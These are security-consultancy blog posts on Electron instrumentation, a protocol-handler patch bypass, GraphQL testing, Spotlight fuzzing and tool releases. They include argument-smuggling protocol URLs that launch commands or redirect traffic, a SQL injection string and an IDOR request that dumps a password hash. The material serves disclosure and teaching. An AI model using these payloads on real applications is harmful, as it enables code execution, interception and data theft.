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Electronegativity is finally out!

23 January 2019 at 23:00

We’re excited to announce the public release of Electronegativity, an opensource tool capable of identifying misconfigurations and security anti-patterns in Electron-based applications.

Electronegativity is the first-of-its-kind tool that can help software developers and security auditors to detect and mitigate potential weaknesses in Electron applications.

If you’re simply interested in trying out Electronegativity, go ahead and install it using NPM:

$ npm install @doyensec/electronegativity -g

To review your application, use the following command:

$ electronegativity -i /path/to/electron/app

Results are displayed in a compact table, with references to application files and our knowledge-base.

Electronegativity Demo

The remaining blog post will provide more details on the public release and introduce its current features.

A bit of history

Back in July 2017 at the BlackHat USA Briefings, we presented the first comprehensive study on Electron security where we primarily focused on framework-level vulnerabilities and misconfigurations. As part of our research journey, we also created a checklist of security anti-patterns and must-have features to illustrate misconfigurations and vulnerabilities in Electron-based applications.

With that, me and Claudio Merloni started developing the first prototype for Electronegativity. Immediately after the BlackHat presentation, we received a lot of great feedback and new ideas on how to evolve the tool. Back home, we started working on those improvements until we realized that we had to rethink the overall design. The code repository was made private again and minor refinements were done in between customer projects only.

In the summer of 2018, we hired Doyensec’s first intern - Ibram Marzouk who started working on the tool again. Later, Jaroslav Lobacevski joined the project team and pushed Electronegativity to the finish line. Claudio, Ibram and Jaroslav, thanks for your contributions!

While certainly overdue, we’re happy that we eventually managed to release the tool in better shape. We believe that Electron is here to stay and hopefully Electronegativity will become a useful companion for all Electron developers out there.

How Does It Work?

Electronegativity leverages AST / DOM parsing to look for security-relevant configurations. Checks are standalone files, which makes the tool modular and extensible.

Building a new check is relatively easy too. We support three “families” of checks, so that the tool can analyze all resources within an Electron application:

When you scan an application, the tool will unpack all resources (if applicable) and perform an audit using all registered checks. Results are displayed in the terminal, CSV file or SARIF format.

Supported Checks

Electronegativity currently implements the following checks. A knowledge-base containing information around risk and auditing strategy has been created for each class of vulnerabilities:


Leveraging these 27 checks, Electronegativity is already capable of identifying many vulnerabilities in real-life applications. Going forward, we will keep improving the detection and updating the tool to keep pace with the fast-changing Electron framework. Start using Electronegativity today!

Introducing burp-rest-api v2

4 November 2018 at 23:00

Since the first commit back in 2016, burp-rest-api has been the default tool for BurpSuite-powered web scanning automation. Many security professionals and organizations have relied on this extension to orchestrate the work of Burp Spider and Scanner.

Today, we’re proud to announce a new major release of the tool: burp-rest-api v2.0.1

Starting in June 2018, Doyensec joined VMware in the development and support of the growing burp-rest-api community. After several years of experience in big tech companies and startups, we understand the need for security automation to improve efficacy and efficiency during software security activities. Unfortunately internal security tools are rarely open-sourced, and still, too many companies are reinventing the wheel. We believe that working together on foundational components, such as burp-rest-api, represents the future of security automation as it empowers companies of any size to build customized solutions.

After a few weeks of work, we cleaned up all the open issues and brought burp-rest-api to its next phase. In this blog post, we would like to summarize some of the improvements.


You can now download the latest version of burp-rest-api from in a precompiled release build. While this may not sound like a big deal, it’s actually the result of a major change in the plugin bootstrap mechanism. Until now, burp-rest-api was strictly dependent on the original Burp Suite JAR to be compiled, hence we weren’t able to create stable releases due to licensing. By re-engineering the way burp-rest-api starts, it is now possible to build the extension without even having burpsuite_pro.jar.

git clone [email protected]:vmware/burp-rest-api.git
cd burp-rest-api
./gradlew clean build

Once built, you can now execute Burp with the burp-rest-api extension using the following command:

java -jar burp-rest-api-2.0.0.jar --burp.jar=./lib/burpsuite_pro.jar

Burp Extensions and BAppStore

Many users have asked for the ability to load additional extensions while running Burp with burp-rest-api. Thanks to a new bootstrap mechanism, burp-rest-api is loaded as a 2nd generation extension which makes it possible to load both custom and BAppStore extensions written in any of the supported programming languages.

Moreover, the tool allows loading extensions during application startup using the flag --burp.ext=<filename.{jar,rb,py}>.

In order to implement this, we employed a classloading technique with a dummy entry point ( that loads the legacy Burp extension ( after the full Burp Suite has been loaded and launched (

Bug Fixes and Improvements

In this release, we have also focused our efforts on a massive issues house-cleaning:

  • Better documentation and even a FAQs page
  • Burp Spider status API
  • Burp Configuration with configPath selection API
  • Enabled SpringBoot compression
  • Ability to customize the binding address:port for both Burp Proxy and burp-rest-api APIs via command line arguments
  • …and much more

Help Us Shape The Future of burp-rest-api

With the release of Burp Suite Professional 2.0 (beta), Burp includes a native Rest API.

While the current functionalities are very limited, this is certainly going to change.

In the initial release, the REST API supports launching vulnerability scans and obtaining the results. Over time, additional functions will be added to the REST API.

It’s great that Burp users will finally benefit from a native Rest API, however this new feature makes us wonder about the future for this project.

Let us know how burp-rest-api can still provide value, and which directions the project could take. Comment on this Github Issue or tweet to our @Doyensec account.

Thank you for the support,

Luca Carettoni & Andrea Brancaleoni

Instrumenting Electron Apps for Security Testing

18 July 2018 at 22:00

Instrumenting Electron-based applications

With the increasing popularity of the Electron Framework, we have created this post to summarize a few techniques which can be used to instrument an Electron-based application, change its behavior, and perform in-depth security assessments.

Electron and processes

The Electron Framework is used to develop multi-platform desktop applications with nothing more than HTML, JavaScript and CSS. It has two core components: Node.js and the libchromiumcontent module from the Chromium project.

In Electron, the main process is the process that runs package.json’s main script. This component has access to Node.js primitives and is responsible for starting other processes. Chromium is used for displaying web pages, which are rendered in separate processes called renderer processes.

Unlike regular browsers where web pages run in a sandboxed environment and do not have access to native system resources, Electron renderers have access to Node.js primitives and allow lower level integration with the underlying operating system. Electron exposes full access to native Node.js APIs, but it also facilitates the use of external Node.js NPM modules.

As you might have guessed from recent public security vulnerabilities, the security implications are substantial since JavaScript code can access the filesystem, user shell, and many more primitives. The inherent security risks increase with the additional power granted to application code. For instance, displaying arbitrary content from untrusted sources inside a non-isolated renderer is a severe security risk. You can read more about Electron Security, hardening and vulnerabilities prevention in the official Security Recommendations document.

Unpacking the ASAR archive

The first thing to do to inspect the source code of an Electron-based application is to unpack the application bundle (.asar file). ASAR archives are a simple tar-like format that concatenates files into a single one.

First locate the main ASAR archive of our app, usually named core.asar or app.asar.

Once we have this file we can proceed with installing the asar utility: npm install -g asar

and extract the whole archive: asar extract core.asar destinationfolder

At its simplest version, an Electron application includes three files: index.js, index.html and package.json.

Our first target to inspect is the package.json file, as it holds the path of the file responsible for the “entry point” of our application:

  "name": "Example App",
  "description": "Core App",
  "main": "app/index.js",
  "private": true,

In our example the entry point is the file called index.js located within the app folder, which will be executed as the main process. If not specified, index.js is the default main file. The file index.html and other web resources are used in renderer processes to display actual content to the user. A new renderer process is created for every browserWindow instantiated in the main process.

In order to be able to follow functions and methods in our favorite IDE, it is recommended to resolve the dependencies of our app:

npm install

We should also install Devtron, a tool (built on top of the Chrome Developer Tools) to inspect, monitor and debug our Electron app. For Devtron to work, NodeIntegration must be on.

npm install --save-dev devtron

Then, run the following from the Console tab of the Developer Tools


Dealing with obfuscated javascript

Whenever the application is neither minimized nor obfuscated, we can easily inspect the code.

'use strict';

Object.defineProperty(exports, "__esModule", {
  value: true
exports.startup = startup;
exports.handleSingleInstance = handleSingleInstance;
exports.setMainWindowVisible = setMainWindowVisible;

var _require = require('electron'),
    Menu = _require.Menu;

var mainScreen = void 0;
function startup(bootstrapModules) {
[ -- cut -- ]

In case of obfuscation, there are no silver bullets to unfold heavily manipulated javascript code. In these situations, a combination of automatic tools and manual reverse engineering is required to get back to the original source.

Take this horrendous piece of JS as an example:

eval(function(c,d,e,f,g,h){g=function(i){return(i<d?'':g(parseInt(i/d)))+((i=i%d)>0x23?String['\x66\x72\x6f\x6d\x43\x68\x61\x72\x43\x6f\x64\x65'](i+0x1d):i['\x74\x6f\x53\x74\x72\x69\x6e\x67'](0x24));};while(e--){if(f[e]){c=c['\x72\x65\x70\x6c\x61\x63\x65'](new RegExp('\x5c\x62'+g(e)+'\x5c\x62','\x67'),f[e]);}}return c;}('\x62\x20\x35\x3d\x5b\x22\x5c\x6f\x5c\x38\x5c\x70\x5c\x73\x5c\x34\x5c\x63\x5c\x63\x5c\x37\x22\x2c\x22\x5c\x72\x5c\x34\x5c\x64\x5c\x74\x5c\x37\x5c\x67\x5c\x6d\x5c\x64\x22\x2c\x22\x5c\x75\x5c\x34\x5c\x66\x5c\x66\x5c\x38\x5c\x71\x5c\x34\x5c\x36\x5c\x6c\x5c\x36\x22\x2c\x22\x5c\x6e\x5c\x37\x5c\x67\x5c\x36\x5c\x38\x5c\x77\x5c\x34\x5c\x36\x5c\x42\x5c\x34\x5c\x63\x5c\x43\x5c\x37\x5c\x76\x5c\x34\x5c\x41\x22\x5d\x3b\x39\x20\x6b\x28\x65\x29\x7b\x62\x20\x61\x3d\x30\x3b\x6a\x5b\x35\x5b\x30\x5d\x5d\x3d\x39\x28\x68\x29\x7b\x61\x2b\x2b\x3b\x78\x28\x65\x2b\x68\x29\x7d\x3b\x6a\x5b\x35\x5b\x31\x5d\x5d\x3d\x39\x28\x29\x7b\x79\x20\x61\x7d\x7d\x62\x20\x69\x3d\x7a\x20\x6b\x28\x35\x5b\x32\x5d\x29\x3b\x69\x2e\x44\x28\x35\x5b\x33\x5d\x29',0x28,0x28,'\x7c\x7c\x7c\x7c\x78\x36\x35\x7c\x5f\x30\x7c\x78\x32\x30\x7c\x78\x36\x46\x7c\x78\x36\x31\x7c\x66\x75\x6e\x63\x74\x69\x6f\x6e\x7c\x5f\x31\x7c\x76\x61\x72\x7c\x78\x36\x43\x7c\x78\x37\x34\x7c\x5f\x32\x7c\x78\x37\x33\x7c\x78\x37\x35\x7c\x5f\x33\x7c\x6f\x62\x6a\x7c\x74\x68\x69\x73\x7c\x4e\x65\x77\x4f\x62\x6a\x65\x63\x74\x7c\x78\x33\x41\x7c\x78\x36\x45\x7c\x78\x35\x39\x7c\x78\x35\x33\x7c\x78\x37\x39\x7c\x78\x36\x37\x7c\x78\x34\x37\x7c\x78\x34\x38\x7c\x78\x34\x33\x7c\x78\x34\x44\x7c\x78\x36\x44\x7c\x78\x37\x32\x7c\x61\x6c\x65\x72\x74\x7c\x72\x65\x74\x75\x72\x6e\x7c\x6e\x65\x77\x7c\x78\x32\x45\x7c\x78\x37\x37\x7c\x78\x36\x33\x7c\x53\x61\x79\x48\x65\x6c\x6c\x6f'['\x73\x70\x6c\x69\x74']('\x7c')));

It can be manually turned into:

eval(function (c, d, e, f, g, h) {
    g = function (i) {
        return (i < d ? '' : g(parseInt(i / d))) + ((i = i % d) > 35 ? String['fromCharCode'](i + 29) : i['toString'](36));
    while (e--) {
        if (f[e]) {
            c = c['replace'](new RegExp('\\b' + g(e) + '\\b', 'g'), f[e]);
    return c;
}('b 5=["\\o\\8\\p\\s\\4\\c\\c\\7","\\r\\4\\d\\t\\7\\g\\m\\d","\\u\\4\\f\\f\\8\\q\\4\\6\\l\\6","\\n\\7\\g\\6\\8\\w\\4\\6\\B\\4\\c\\C\\7\\v\\4\\A"];9 k(e){b a=0;j[5[0]]=9(h){a++;x(e+h)};j[5[1]]=9(){y a}}b i=z k(5[2]);i.D(5[3])', 40, 40, '||||x65|_0|x20|x6F|x61|function|_1|var|x6C|x74|_2|x73|x75|_3|obj|this|NewObject|x3A|x6E|x59|x53|x79|x67|x47|x48|x43|x4D|x6D|x72|alert|return|new|x2E|x77|x63|SayHello'['split']('|')));

Then, it can be passed to JStillery, JS Nice and other similar tools in order to get back a human readable version.

'use strict';
var _0 = ["SayHello", "GetCount", "Message : ", "You are welcome."];
function NewObject(contentsOfMyTextFile) {
  var _1 = 0;
  this[_0[0]] = function(theLibrary) {
    alert(contentsOfMyTextFile + theLibrary);
  this[_0[1]] = function() {
    return _1;
var obj = new NewObject(_0[2]);

Enabling the developer tools in the renderer process

During testing, it is particularly important to review all web resources as we would normally do in a standard web application assessment. For this reason, it is highly recommended to enable the Developer Tools in all renderers and <webview> tags.

Electron’s Main process can use the BrowserWindow API to call the BrowserWindow method and instantiate a new renderer.

In the example below, we are creating a new BrowserWindow instance with specific attributes. Additionally, we can insert a new statement to launch the Developer tools:


var winOptions = {
    title: 'Example App',
    backgroundColor: '#ffffff',
    width: DEFAULT_WIDTH,
    height: DEFAULT_HEIGHT,
    minWidth: MIN_WIDTH,
    minHeight: MIN_HEIGHT,
    transparent: false,
    frame: false,
    resizable: true,
    show: isVisible,
    webPreferences: {
      nodeIntegration: false,
      preload: _path2.default.join(__dirname, 'preload.js')

[ -- cut -- ]

mainWindow = new _electron.BrowserWindow(winOptions);
  winId =;

//|--> HERE we can hook and add the Developers Tools <--|
win.webContents.openDevTools({ mode: 'bottom' })

If everything worked fine, we should have the Developers Tools enabled for the main UI screen.

From the main Developer Tool console, we can open additional developer tools windows for other renderers (e.g. webview tags).


While reading the code above, have you noticed the webPreference options?

WebPreferences options are basically settings for the renderer process and include things like window size, appearance, colors, security features, etc. Some of these settings are pretty useful for debugging purposes too.

For example, we can make all windows visible by using the show property of WebPreferences:

BrowserWindow({show: true})

Adding debugging statements

During instrumentation, it is useful to include debugging code such as

console.log("\n--------------- Debug --------------------\n")
console.log("\n--------------- Debug --------------------\n")

Debugging the main process

Since it is not possible to open the developer tools for the Main Process, debugging this component is a bit trickier. Luckily, Chromium’s Developer Tools can be used to debug Electron’s main process with just a minor adjustment.

The DevTools in an Electron browser window can only debug JavaScript executed in that window (i.e. the web page). To debug JavaScript executed in the main process you will need to leverage the native debugger and launch Electron with the --inspect or --inspect-brk switch.

Use one of the following command line switches to enable debugging of the main process:

–inspect=[port] Electron will listen for V8 inspector protocol messages on the specified port, an external debugger will need to connect on this port. The default port is 5858.

–inspect-brk=[port] Like –inspect but pauses execution on the first line of JavaScript.

Usage: electron --inspect=5858 your-app

You can now connect Chrome by visiting chrome://inspect and analyze the launched Electron app present there.

Intercepting HTTP(s) traffic

Chromium supports system proxy settings on all platforms, so setup a proxy and then add Burp CA as usual.

We can even use the following command line argument if you run the Electron application directly. Please note that this does not work when using the bundled app.


Or, programmatically with these lines in the main app:

const {app} = require('electron') 
app.commandLine.appendSwitch('proxy-server', '')

For Node, use transparent proxying by either changing /etc/hosts or overriding configs:

npm config set proxy http://localhost:8080
npm config set https-proxy http://localhost:8081

In case you need to revert the proxy settings, use:

npm config rm proxy
npm config rm https-proxy

However, you need to disable TLS validation with the following code within the application under testing:



Proper instrumentation is a fundamental step in performing a comprehensive security test. Combining source code review with dynamic testing and client instrumentation, it is possible to analyze every aspect of the target application. These simple techniques allow us to reach edge cases, exercise all code paths and eventually find vulnerabilities.

@voidsec @lucacarettoni

Read more

Electron Windows Protocol Handler MITM/RCE (bypass for CVE-2018-1000006 fix)

23 May 2018 at 22:00

As part of an engagement for one of our clients, we analyzed the patch for the recent Electron Windows Protocol handler RCE bug (CVE-2018-1000006) and identified a bypass.

Under certain circumstances this bypass leads to session hijacking and remote code execution. The vulnerability is triggered by simply visiting a web page through a browser. Electron apps designed to run on Windows that register themselves as the default handler for a protocol and do not prepend dash-dash in the registry entry are affected.

We reported the issue to the Electron core team (via [email protected]) on May 14, 2018 and received immediate notification that they were already working on a patch. The issue was also reported by Google’s Nicolas Ruff a few days earlier.


On January 22, 2018 Electron released a patch for v1.7.11, v1.6.16 and v1.8.2-beta4 for a critical vulnerability known as CVE-2018-1000006 (surprisingly no fancy name here) affecting Electron-based applications running on Windows that register custom protocol handlers.

The original issue was extensively discussed in many blog posts, and can be summarized as the ability to use custom protocol handlers (e.g. myapp://) from a remote web page to piggyback command line arguments and insert a new switch that Electron/Chromium/Node would recognize and execute while launching the application.

win.location = 'myapp://foobar" --gpu-launcher="cmd c/ start calc" --foobar='

Interestingly, on January 31, 2018, Electron v1.7.12, v1.6.17 and v1.8.2-beta5 were released. It turned out that the initial patch did not take into account uppercase characters and led to a bypass in the previous patch with:

win.location = 'myapp://foobar" --GPU-launcher="cmd c/ start calc" --foobar='

Understanding the patch

The patch for CVE-2018-1000006 is implemented in electron/atom/app/ and consists of a validation mechanism which ensures users won’t be able to include Electron/Chromium/Node arguments after a url (the specific protocol handler). Bear in mind some locally executed applications do require the ability to pass custom arguments.

bool CheckCommandLineArguments(int argc, base::CommandLine::CharType** argv) {
  DCHECK(std::is_sorted(std::begin(kBlacklist), std::end(kBlacklist),
                        [](const char* a, const char* b) {
                          return base::StringPiece(a) < base::StringPiece(b);
      << "The kBlacklist must be in sorted order";
  DCHECK(std::binary_search(std::begin(kBlacklist), std::end(kBlacklist),
      << "Remember to add Node command line flags to kBlacklist";

  const base::CommandLine::StringType dashdash(2, '-');
  bool block_blacklisted_args = false;
  for (int i = 0; i < argc; ++i) {
    if (argv[i] == dashdash)
    if (block_blacklisted_args) {
      if (IsBlacklistedArg(argv[i]))
        return false;
    } else if (IsUrlArg(argv[i])) {
      block_blacklisted_args = true;
  return true;

As is commonly seen, blacklist-based validation is prone to errors and omissions especially in complex execution environments like Electron:

  • The patch relies on a static blacklist of available chromium flags. On each libchromiumcontent update the Electron team must remember to update the file in order to make sure the blacklist is aligned with the current implementation of Chromium/v8
  • The blacklist is implemented using a binary search. Valid flags could be missed by the check if they’re not properly sorted

Bypass and security implications

We started looking for missed flags and noticed that host-rules was absent from the blacklist. With this flag one may specify a set of rules to rewrite domain names for requests issued by libchroumiumcontent. This immediately stuck out as a good candidate for subverting the process.

In fact, an attacker can exploit this issue by overriding the host definitions in order to perform completely transparent Man-In-The-Middle:

<!doctype html>
 window.location = 'skype://user?userinfo" --host-rules="MAP *" --foobar='

When a user visits a web page in a browser containing the preceding code, the Skype app will be launched and all Chromium traffic will be forwarded to instead of the original domain. Since the connection is made to the attacker-controlled host, certificate validation does not help as demonstrated in the following video:

We analyzed the impact of this vulnerability on popular Electron-based apps and developed working proof-of-concepts for both MITM and RCE attacks. While the immediate implication is that an attacker can obtain confidential data (e.g. oauth tokens), this issue can be also abused to inject malicious HTML responses containing XSS -> RCE payloads. With nodeIntegration enabled, this is simply achieved by leveraging Node’s APIs. When encountering application sandboxing via nodeIntegration: false or sandbox, it is necessary to chain this with other bugs (e.g. nodeIntegration bypass or IPC abuses).

Please note it is only possible to intercept traffic generated by Chromium, and not Node. For this reason Electron’s update feature, along with other critical functionss, are not affected by this vulnerability.


On May 16, 2018, Electron released a new update containing an improved version of the blacklist for v2.0.1, v1.8.7, and v1.7.15. The team is actively working on a more resilient solution to prevent further bypasses. Considering that the API change may potentially break existing apps, it makes sense to see this security improvement within a major release.

In the meantime, Electron application developers are recommended to enforce a dash-dash notation in setAsDefaultProtocolClient

app.setAsDefaultProtocolClient(protocol, process.execPath, [

or in the Windows protocol handler registry entry

secure Windows protocol handler

As a final remark, we would like to thank the entire Electron team for their work on moving to a secure-by-default framework. Electron contributors are tasked with the non-trivial mission of closing the web-native desktop gap. Modern browsers are enforcing numerous security mechanisms to ensure isolation between sites, facilitate web security protections and prevent untrusted remote content from compromising the security of the host. When working with Electron, things get even more complicated.



GraphQL - Security Overview and Testing Tips

16 May 2018 at 22:00

With the increasing popularity of GraphQL technology we are summarizing some documentation and tips about common security mistakes.

What is GraphQL?

GraphQL is a data query language developed by Facebook and publicly released in 2015. It is an alternative to REST API.

Even if you don’t see any GraphQL out there, it is likely you’re already using it since it’s running on some big tech giants like Facebook, GitHub, Pinterest, Twitter, HackerOne and a lot more.

A few key points on this technology

  • GraphQL provides a complete and understandable description of the data in the API and gives clients the power to ask for exactly what they need. Queries always return predictable results.

  • While typical REST APIs require loading from multiple URLs, GraphQL APIs get all the data your app needs in a single request.

  • GraphQL APIs are organized in terms of types and fields, not endpoints. You can access the full capabilities of all your data from a single endpoint.

  • GraphQL is strongly typed to ensure that application only ask for what’s possible and provide clear and helpful errors.

  • New fields and types can be added to the GraphQL API without impacting existing queries. Aging fields can be deprecated and hidden from tools.

Before we start diving into the GraphQL security landscape, here is a brief recap on how it works. The official documentation is well written and was really helpful.

A GraphQL query looks like this:

Basic GraphQL Query


While the response is JSON:

Basic GraphQL Response

	"data": {
		"user": {
			"id": "1",
			"email": "[email protected]",
			"firstName": "Paolo",
			"lastName": "Stagno"

Security Testing Tips

Since Burp Suite does not understand GraphQL syntax well, I recommend using the graphql-ide, an Electron based app that allows you to edit and send requests to a GraphQL endpoint; I also wrote a small python script that enumerates a GraphQL endpoint (with introspection) in order to pull out documentation. The script is useful for examining the GraphQL schema looking for information leakage, hidden data and fields that are not intended to be accessible.

The tool will generate a HTML report similar to the following:

Python Script pulling data from a GraphQL endpoint

Introspection is used to ask for a GraphQL schema for information about what queries, types and so on it supports.

As a pentester, I would recommend to look for requests issued to “/graphql” or “/graphql.php” since those are usual GraphQL endpoint names; you should also search for “/graphiql”, ”graphql/console/”, online GraphQL IDEs to interact with the backend, and “/graphql.php?debug=1” (debugging mode with additional error reporting) since they may be left open by developers.

When testing an application, verify whether requests can be issued without the usual authorization token header:

GraphQL Bearer Authorization Header Example

Since the GraphQL framework does not provide any means for securing your data, developers are in charge of implementing access control as stated in the documentation:

“However, for a production codebase, delegate authorization logic to the business logic layer”.

Things may go wrong, thus it is important to verify whether a user without proper authentication and/or authorization can request the whole underlying database from the server.

When building an application with GraphQL, developers have to map data to queries in their chosen database technology. This is where security vulnerabilities can be easily introduced, leading to Broken Access Controls, Insecure Direct Object References and even SQL/NoSQL Injections.

As an example of a broken implementation, the following request/response demonstrates that we can fetch data for any users of the platform (cycling through the ID parameter), while simultaneously dumping password hashes:


	user(id: 165274){


	"data": {
		"user": {
			"id": "165274",
			"email": "[email protected]",
			"firstName": "John",
			"lastName": "Doe"
			"password": "5F4DCC3B5AA765D61D8327DEB882CF99"

Another thing that you will have to check is related to information disclosure when trying to perform illegal queries:

Information Disclosure

	"errors": [
			"message": "Invalid ID.",
			"locations": [
					"line": 2,
					"column": 12
				"Stack": "Error: invalid ID\n at (/var/www/examples/04-bank/graphql.php)\n"

Even though GraphQL is strongly typed, SQL/NoSQL Injections are still possible since GraphQL is just a layer between client apps and the database. The problem may reside in the layer developed to fetch variables from GraphQL queries in order to interrogate the database; variables that are not properly sanitized lead to old simple SQL Injection. In case of Mongodb, NoSQL injection may not be that simple since we cannot “juggle” types (e.g. turning a string into an array. See PHP MongoDB Injection).

GraphQL SQL Injection

mutation search($filters Filters!){
	authors(filter: $filters)

		"username":"paolo' or 1=1--"

Beware of nested queries! They can allow a malicious client to perform a DoS (Denial of Service) attack via overly complex queries that will consume all the resources of the server:

Nested Query

query {

An easy remediation against DoS could be setting a timeout, a maximum depth or a query complexity threshold value.

Keep in mind that in the PHP GraphQL implementation:

  • Complexity analysis is disabled by default

  • Limiting Query Depth is disabled by default

  • Introspection is enabled by default. It means that anybody can get a full description of your schema by sending a special query containing meta fields type and schema


GraphQL is a new interesting technology, which can be used to build secure applications. Since developers are in charge of implementing access control, applications are prone to classical web application vulnerabilites like Broken Access Controls, Insecure Direct Object References, Cross Site Scripting (XSS) and Classic Injection Bugs. As any technology, GraphQL-based applications may be prone to development implementation errors like this real-life example:

“By using a script, an entire country’s (I tested with the US, the UK and Canada) possible number combinations can be run through these URLs, and if a number is associated with a Facebook account, it can then be associated with a name and further details (images, and so on).”



We're hiring - Join Doyensec!

26 November 2017 at 23:00

At Doyensec, we believe that quality is the natural product of passion and care. We love what we do and we routinely take on difficult engineering challenges to help our customers build with security.

We are a small highly focused team. We concentrate on application security and do fewer things better. We don’t care about your education, background and certifications. If you are really good and passionate at building and breaking complex software, you’re the right candidate.

Open Positions

:: Full-stack Security Automation Engineer (Six Months Collaboration, Remote Work) ::

We are looking for a full-stack senior software engineer that can help us build security automation tools. If you’ve ever built a fuzzer, played with static analysis and enhanced a web scanner engine, you probably have the right skillset for the job.

We offer a well-paid six-months collaboration, combined with an additional bonus upon successful completion of the project.


  • Full-stack development (front-end, back-end components) of web security testing tools
  • Solve technical challenges at the edge of web security R&D, together with Doyensec’s founders


  • Experience developing multi-tiered software applications or products. We generally use Node.js and Java, and require proficiency in those languages
  • Ability to work with standard dev tools and techniques (IDE, git, …)
  • You’re passionate about building great software and can have fun while doing it
  • Interested in web security, with good understanding of common software vulnerabilities
  • You’re self-driven and can focus on a project to make it happen
  • Eager to learn, adapt and perfect your work

Contact us at [email protected]

:: Application Security Engineer (Full-time, Remote Work - Europe) ::

We are looking for an experienced security engineer to join our consulting team. We perform graybox security testing on complex web and mobile applications. We need someone who can hit the ground running. If you’re good at “crawling around in the ventilation ducts of the world’s most popular and important applications”, you probably have the right skillset for the job.

We offer a competitive salary in a supportive and dynamic environment that rewards hard work and talent. We are dedicated to providing research-driven application security and therefore invest 25% of your time exclusively to research where we build security testing tools, discover new attack techniques, and develop countermeasures.


  • Security testing of web, mobile (iOS, Android) applications
  • Vulnerability research activities, coordinated and executed with Doyensec’s founders
  • Partner with customers to ensure project’s objectives are achieved 


  • Ability to discover, document and fix security bugs
  • You’re passionate about understanding complex systems and can have fun while doing it
  • Top-notch in web security. Show us public research, code, advisories, etc.
  • Eager to learn, adapt, and perfect your work

Contact us at [email protected]

Staring into the Spotlight

14 November 2017 at 23:00

Spotlight is the all pervasive seeing eye of the OSX userland. It drinks from a spout of file events sprayed out of the kernel and neatly indexes such things for later use. It is an amalgamation of binaries and libraries, all neatly fitted together just to give a user oversight of their box. It presents interesting attack surface and this blog post is an explanation of how some of it works.

One day, we found some interesting looking crashes recorded in /Users/<name>/Library/Logs/DiagnosticReports

Yet the crashes weren’t from the target. In OSX, whenever a file is created, a filesystem event is generated and sent down from the kernel. Spotlight listens for this event and others to immediately parse the created file for metadata. While fuzzing a native file parser these Spotlight crashes began to appear from mdworker processes. Spotlight was attempting to index each of the mutated input samples, intending to include them in search results later.


The Spotlight system is overseen by mds. It opens and reads from /dev/fsevents, which streams down file system event information from the kernel. Instead of dumping the events to disk, like fseventsd, it dumps the events into worker processes to be parsed on behalf of Spotlight. Mds is responsible for delegating work and managing mdworker processes with whom it communicates through mach messaging. It creates, monitors, and kills mdworkers based on some light rules. The kernel does not block and the volume of events streaming through the fsevents device can be quite a lot. Mds will spawn more mdworker processes when handling a higher event magnitude but there is no guarantee it can see and capture every single event.

The kernel filters which root level processes can read from this device. fsevents filter

Each of the mdworker processes get spawned, parse some files, write the meta info, and die. Mdworker shares a lot of code with mdimport, its command line equivalent. The mdimport binary is used to debug and test Spotlight importers and therefore makes a great target for auditing and fuzzing. Much of what we talk about in regards to mdimport also applies to mdworker.


You can see what mdworkers are up to with the following: sudo fs_usage -w -f filesys mdworker

Importers are found in /Library/Spotlight, /System/Library/Spotlight, or in an application’s bundle within “/Contents/Library/Spotlight”. If the latter is chosen, the app typically runs a post install script with mdimport -r <importer> and/or lsregister. The following command shows the list of importers present on my laptop. It shows some third party apps have installed their own importers.

$ mdimport -L
2017-07-30 00:36:15.518 mdimport[40541:1884333] Paths: id(501) (
    "/Library/Spotlight/Microsoft Office.mdimporter",

These .mdimporter files are actually just packages holding a binary. These binaries are what we are attacking.

Using mdimport is simple - mdimport <file>. Spotlight will only index metadata for filetypes having an associated importer. File types are identified through magic. For example, mdimport reads from the MAGIC environment variable or uses the “/usr/share/file/magic” directory which contains both the compiled .mgc file and the actual magic patterns. The format of magic files is discussed at the official Apple developer documentation.

Crash File

crash logging

One thing to notice is that the crash log will contain some helpful information about the cause. The following message gets logged by both mdworker and mdimport, which share much of the same code:

Application Specific Information:
import fstype:hfs fsflag:480D000 flags:40000007E diag:0 isXCode:0 plugin:/Library/Spotlight/Font.mdimporter - find suspect file using: sudo mdutil -t 2682437

The 2682437 is the iNode reference number for the file in question on disk. The -t argument to mdutil will ask it to lookup the file based on volume ID and iNode and spit out the string. It performs an open and fcntl on the pseudo directory /.vol/<Volume ID>/<File iNode>. You can see this info with the stat syscall on a file.

$ stat /etc
16777220 418395 lrwxr-xr-x 1 root wheel 0 11 "Dec 10 05:13:41 2016" "Dec 10 05:13:41 2016" "Dec 10 05:15:47 2016" "Dec 10 05:13:41 2016" 4096 8 0x88000 /etc

$ ls /.vol/16777220/418395
afpovertcp.cfg    fstab.hd            networks          protocols
aliases           ftpd.conf           newsyslog.conf    racoon
aliases.db        ftpd.conf.default   newsyslog.d       rc.common

The UTI registered by the importer is also shown “”. In this case, the crash is caused by a malformed Datafork TrueType suitcase (.dfont) file.

When we find a bug, we can study it under lldb. Launch mdimport under the debugger with the crash file as an argument. In this particular bug it breaks with an exception in the /System/Library/Spotlight/Font.mdimporter importer.

crash logging

The screenshot below shows the problem procedure with the crashing instruction highlighted for this particular bug.

The rsi register points into the memory mapped font file. A value is read out and stored in rax which is then used as an offset from rcx which points to the text segment of the executable in memory. A lookup is done on a hardcoded table and parsing proceeds from there. The integer read out of the font file is never validated.

When writing or reversing a Spotlight importer, the main symbol to first look at will be GetMetadataForFile or GetMetadataForURL. This function receives a path to parse and is expected to return the metadata as a CFDictionary.

We can see, from the stacktrace, how and where mdimport jumps into the GetMetadataForFile function in the Font importer. Fuzzing mdimport is straightforward, crashes and signals are easily caught.

The variety of importers present on OSX are sometimes patched alongside the framework libraries, as code is shared. However, a lot of code is unique to these binaries and represents a nice attack surface. The Spotlight system is extensive, including its own query language and makes a great target where more research is needed.

When fuzzing in general on OSX, disable Spotlight oversight of the folder where you generate and remove your input samples. The folder can be added in System Preferences->Spotlight->Privacy. You can’t fuzz mdimport from this folder, instead disable Spotlight with “mdutil -i off” and run your fuzzer from a different folder.


Modern Alchemy: Turning XSS into RCE

2 August 2017 at 22:00


At the recent Black Hat Briefings 2017, Doyensec’s co-founder Luca Carettoni presented a new research on Electron security. After a quick overview of Electron’s security model, we disclosed design weaknesses and implementation bugs that can be leveraged to compromise any Electron-based application. In particular, we discussed a bypass that would allow reliable Remote Code Execution (RCE) when rendering untrusted content (for example via Cross-Site Scripting) even with framework-level protections in place.

In this blog post, we would like to provide insight into the bug (CVE-2017-12581) and remediations.

What’s Electron?

While you may not recognize the name, it is likely that you’re already using Electron since it’s running on millions of computers. Slack, Atom, Visual Studio Code, WordPress Desktop, Github Desktop, Basecamp3, Mattermost are just few examples of applications built using this framework. Any time that a traditional web application is ported to desktop, it is likely that the developers used Electron.

Electron Motto

Understanding the nodeIntegration flag

